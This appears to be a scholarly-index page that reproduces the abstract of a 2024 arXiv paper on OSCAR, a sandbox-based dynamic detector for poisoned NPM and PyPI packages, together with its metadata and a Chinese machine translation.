Towards Robust Detection of Open Source Software Supply Chain Poisoning Attacks in Industry Environments

arXiv - CS - Software Engineering Pub Date : 2024-09-14 DOI:arxiv-2409.09356

Xinyi Zheng, Chen Wei, Shenao Wang, Yanjie Zhao, Peiming Gao, Yuanchao Zhang, Kailong Wang, Haoyu Wang

{"title":"Towards Robust Detection of Open Source Software Supply Chain Poisoning Attacks in Industry Environments","authors":"Xinyi Zheng, Chen Wei, Shenao Wang, Yanjie Zhao, Peiming Gao, Yuanchao Zhang, Kailong Wang, Haoyu Wang","doi":"arxiv-2409.09356","DOIUrl":null,"url":null,"abstract":"The exponential growth of open-source package ecosystems, particularly NPM\nand PyPI, has led to an alarming increase in software supply chain poisoning\nattacks. Existing static analysis methods struggle with high false positive\nrates and are easily thwarted by obfuscation and dynamic code execution\ntechniques. While dynamic analysis approaches offer improvements, they often\nsuffer from capturing non-package behaviors and employing simplistic testing\nstrategies that fail to trigger sophisticated malicious behaviors. To address\nthese challenges, we present OSCAR, a robust dynamic code poisoning detection\npipeline for NPM and PyPI ecosystems. OSCAR fully executes packages in a\nsandbox environment, employs fuzz testing on exported functions and classes,\nand implements aspect-based behavior monitoring with tailored API hook points.\nWe evaluate OSCAR against six existing tools using a comprehensive benchmark\ndataset of real-world malicious and benign packages. OSCAR achieves an F1 score\nof 0.95 in NPM and 0.91 in PyPI, confirming that OSCAR is as effective as the\ncurrent state-of-the-art technologies. Furthermore, for benign packages\nexhibiting characteristics typical of malicious packages, OSCAR reduces the\nfalse positive rate by an average of 32.06% in NPM (from 34.63% to 2.57%) and\n39.87% in PyPI (from 41.10% to 1.23%), compared to other tools, significantly\nreducing the workload of manual reviews in real-world deployments. In\ncooperation with Ant Group, a leading financial technology company, we have\ndeployed OSCAR on its NPM and PyPI mirrors since January 2023, identifying\n10,404 malicious NPM packages and 1,235 malicious PyPI packages over 18 months.\nThis work not only bridges the gap between academic research and industrial\napplication in code poisoning detection but also provides a robust and\npractical solution that has been thoroughly tested in a real-world industrial\nsetting.","PeriodicalId":501278,"journal":{"name":"arXiv - CS - Software Engineering","volume":"44 1","pages":""},"PeriodicalIF":0.0000,"publicationDate":"2024-09-14","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"0","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"arXiv - CS - Software Engineering","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/arxiv-2409.09356","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}

引用次数: 0

Abstract

The exponential growth of open-source package ecosystems, particularly NPM and PyPI, has led to an alarming increase in software supply chain poisoning attacks. Existing static analysis methods struggle with high false positive rates and are easily thwarted by obfuscation and dynamic code execution techniques. While dynamic analysis approaches offer improvements, they often suffer from capturing non-package behaviors and employing simplistic testing strategies that fail to trigger sophisticated malicious behaviors. To address these challenges, we present OSCAR, a robust dynamic code poisoning detection pipeline for NPM and PyPI ecosystems. OSCAR fully executes packages in a sandbox environment, employs fuzz testing on exported functions and classes, and implements aspect-based behavior monitoring with tailored API hook points. We evaluate OSCAR against six existing tools using a comprehensive benchmark dataset of real-world malicious and benign packages. OSCAR achieves an F1 score of 0.95 in NPM and 0.91 in PyPI, confirming that OSCAR is as effective as the current state-of-the-art technologies. Furthermore, for benign packages exhibiting characteristics typical of malicious packages, OSCAR reduces the false positive rate by an average of 32.06% in NPM (from 34.63% to 2.57%) and 39.87% in PyPI (from 41.10% to 1.23%), compared to other tools, significantly reducing the workload of manual reviews in real-world deployments. In cooperation with Ant Group, a leading financial technology company, we have deployed OSCAR on its NPM and PyPI mirrors since January 2023, identifying 10,404 malicious NPM packages and 1,235 malicious PyPI packages over 18 months. This work not only bridges the gap between academic research and industrial application in code poisoning detection but also provides a robust and practical solution that has been thoroughly tested in a real-world industrial setting.

查看原文本刊更多论文

在工业环境中实现对开源软件供应链中毒攻击的稳健检测

开源软件包生态系统（尤其是 NPM 和 PyPI）的指数式增长导致软件供应链中毒攻击的惊人增长。现有的静态分析方法误报率很高，很容易被混淆和动态代码执行技术所挫败。虽然动态分析方法有所改进，但它们往往无法捕捉到非软件包行为，采用的简单测试策略也无法触发复杂的恶意行为。为了应对这些挑战，我们提出了 OSCAR，这是一个适用于 NPM 和 PyPI 生态系统的强大的动态代码中毒检测管道。OSCAR 在andbox 环境中完全执行软件包，对导出函数和类进行模糊测试，并通过定制的 API 钩子点实现基于方面的行为监控。OSCAR 在 NPM 中的 F1 得分为 0.95，在 PyPI 中的 F1 得分为 0.91，证明 OSCAR 与当前最先进的技术一样有效。此外，对于具有恶意软件包典型特征的良性软件包，与其他工具相比，OSCAR 在 NPM 中平均降低了 32.06%（从 34.63% 降至 2.57%），在 PyPI 中平均降低了 39.87%（从 41.10% 降至 1.23%），显著减少了实际部署中人工审核的工作量。我们与领先的金融科技公司蚂蚁金服集团合作，自2023年1月起在其NPM和PyPI镜像上部署了OSCAR，在18个月的时间里识别出了10,404个恶意NPM包和1,235个恶意PyPI包。这项工作不仅缩小了代码中毒检测方面的学术研究与工业应用之间的差距，还提供了一个在真实的工业环境中经过全面测试的强大而实用的解决方案。

本文章由计算机程序翻译，如有差异，请以英文原文为准。

求助全文

约1分钟内获得全文求助全文

来源期刊

arXiv - CS - Software Engineering

自引率

0.00%

发文量